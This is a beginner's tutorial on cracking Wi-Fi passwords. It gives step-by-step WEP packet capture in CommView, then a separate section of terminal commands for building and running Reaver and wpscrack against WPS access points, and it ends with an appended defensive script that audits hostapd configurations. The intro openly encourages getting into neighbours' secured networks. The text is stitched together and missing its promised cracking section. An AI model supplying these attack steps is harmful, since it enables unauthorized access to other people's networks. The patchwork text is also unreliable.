An internet connection has become a basic necessity in our modern lives. Wireless hot-spots (commonly known as Wi-Fi) can be found everywhere! If you have a PC with a wireless network card, then you must have seen many networks around you. Sadly most of these networks are secured with a network security key. Have you ever wanted to use one of these networks? You must have desperately wanted to check your mail when you shifted to your new house. The hardest time in your life is when your internet connection is down. Cracking those Wi-Fi passwords is your answer to temporary internet access. This is a comprehensive guide which will teach even complete beginners how to crack WEP encrypted networks, easily.
Table of Contents
1. How are Wireless networks secured?
2. What you'll need
3. Setting up CommView for Wi-Fi
4. Selecting the target network and capturing packets
5. Waiting...
6. Now the interesting part... CRACKING!
7. Are you a visual learner?
This is by far the biggest requirement. The wireless card of your computer has to be compatible with the software CommView. This ensures that the wireless card can go into monitor mode, which is essential for capturing packets. Click here to check if your wireless card is compatible.
This software will be used to capture the packets from the desired network adapter. Click here and download the software from the website.
After capturing the packets, this software does the actual cracking. Click here and download the software from the website.
1. Download the zip file of CommView for Wi-Fi from the website.
2. Extract the file and run setup.exe to install CommView for Wi-Fi.
3. When CommView opens for the first time, it has a driver installation guide. Follow the prompts to install the driver for your wireless card.
4. Run CommView for Wi-Fi.
5. Click the play icon on the top left of the application window.
Start scanning for wireless networks. CommView now starts scanning for wireless networks channel by channel. After a few minutes you will have a long list of wireless networks with their security type and signal. Now it is time to choose your target network.
So make sure you select a network with WEP next to its name.
Choose a network with the highest signal. Each network will have its details in the right column. Make sure the WEP network you are choosing has the least dB (decibel) value.
Once you have chosen your target network, select it and click Capture to start capturing packets from the desired channel. Now you might notice that packets are being captured from all the networks in the particular channel. To capture packets only from the desired network, follow the given steps.
1. Right click the desired network and click on copy MAC Address.
2. Switch to the Rules tab on the top.
3. On the left hand side choose MAC Addresses.
4. Enable MAC Address rules.
5. For 'Action' select 'capture' and for 'Add record' select 'both'.
6. Now paste the MAC address copied earlier in the box below.

We need to capture only data packets for cracking. Hence select D on the bar at the top of the window and deselect M (Management packets) and C (Control packets). Now you have to save the packets so that they can be cracked later. To do this:

1. Go to the logging tab on top and enable auto saving.
2. Set Maximum Directory Size to 2000.
3. Set Average Log File Size to 20.
Step 3: Waiting...
Now the boring part: WAITING! NOTE: The amount of time taken to capture enough data packets depends on the signal and the network's usage. You should capture a minimum of 100,000 packets for a decent signal. After you think you have enough packets (at least 100,000 packets):

1. Go to the log tab and click on concatenate logs.
2. Select all the logs that have been saved.
3. Do not close CommView for Wi-Fi.
4. Now navigate to the folder where the concatenated logs have been saved.
5. Open the log file.
6. Select File - Export - Wireshark/tcpdump format and choose any suitable destination.
7. This will save the logs with a .cap extension to that location.

You may also receive a request to try with more packets. In this case, wait until more packets have been captured and repeat the steps to be performed after capturing packets.
BEST OF LUCK
Requirements
- Linux OS
- A router at home with WPS
- The following programs installed (install by package name): aircrack-ng, python-pycryptopp, python-scapy, libpcap-dev
Tools
- Reaver (support for all routers)
- wpscrack (faster, but only support for major router brands)
Crack WPS
Text in bold is a terminal command. Follow the guide that corresponds to the tool that you chose to use below.
Reaver
1. Unzip Reaver.
   unzip reaver-1.3.tar.gz
2. Change to the Reaver directory.
   cd reaver-1.3
3. Configure, compile and install the application.
   ./configure && make && sudo make install
4. Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX).
   sudo iwlist scan wlan0
5. Set your device into monitor mode.
   sudo airmon-ng start wlan0
6. Run the tool against an access point.
   reaver -i mon0 -b <MA:CA:DD:RE:SS:XX> -vv
7. Wait until it finishes.
wpscrack.py
1. Make the program an executable.
   chmod +x wpscrack.py
2. Scan for an access point to attack, and copy its MAC address for later (XX:XX:XX:XX:XX:XX).
   sudo iwlist scan wlan0
3. Get your MAC address, save it for later.
   ip link show wlan0 | awk '/ether/ {print $2}'
4. Set your device into monitor mode.
   sudo airmon-ng start wlan0
5. Attack your AP.
   wpscrack.py iface mon0 client <your MAC, because you're attacking yourself, right?> bssid <AP MAC address> --ssid <name of your AP> -v
6. Await victory.
Now, let's hope we see a lot of firmware update action going on in the near future, or else a lot of places are in a whole world of trouble.
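
Until such firmware arrives, both weaknesses this guide relies on (WEP encryption and an enabled WPS PIN) can be checked and closed on the access point itself. The following is an added example, not part of the original guide: it assumes a hostapd-based access point, and the function names and both sample configurations are constructed for illustration.

```python
# Added example: audit hostapd.conf text for WEP and an exposed WPS AP PIN.
def parse_conf(text):
    """Parse hostapd.conf 'key=value' lines, skipping blanks and '#' comments."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        conf[key.strip()] = value.strip()
    return conf

def audit(text):
    """Return a list of finding codes: 'WEP' and/or 'WPS_AP_PIN'."""
    conf = parse_conf(text)
    findings = []
    # wpa=0 (or absent) with WEP keys configured means the BSS runs WEP.
    wpa_mode = int(conf.get("wpa", "0"))
    has_wep_key = any(k.startswith("wep_key") for k in conf)
    if wpa_mode == 0 and has_wep_key:
        findings.append("WEP")
    # wps_state 1 or 2 turns WPS on; a static ap_pin lets external registrars
    # authenticate with the PIN unless ap_setup_locked=1.
    wps_on = conf.get("wps_state", "0") in ("1", "2")
    pin_open = "ap_pin" in conf and conf.get("ap_setup_locked", "0") != "1"
    if wps_on and pin_open:
        findings.append("WPS_AP_PIN")
    return findings

# Constructed sample configurations (not taken from any real device).
WEAK_CONF = """\
ssid=home-ap
wep_default_key=0
wep_key0=0123456789
wps_state=2
ap_pin=12345670
"""

HARDENED_CONF = """\
ssid=home-ap
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=constructed-passphrase-change-me
wps_state=0
"""

if __name__ == "__main__":
    print("weak:", audit(WEAK_CONF))
    print("hardened:", audit(HARDENED_CONF))
```

On consumer routers that do not expose a hostapd.conf, the equivalent settings are the security mode (WPA2 instead of WEP) and the WPS switch in the admin interface.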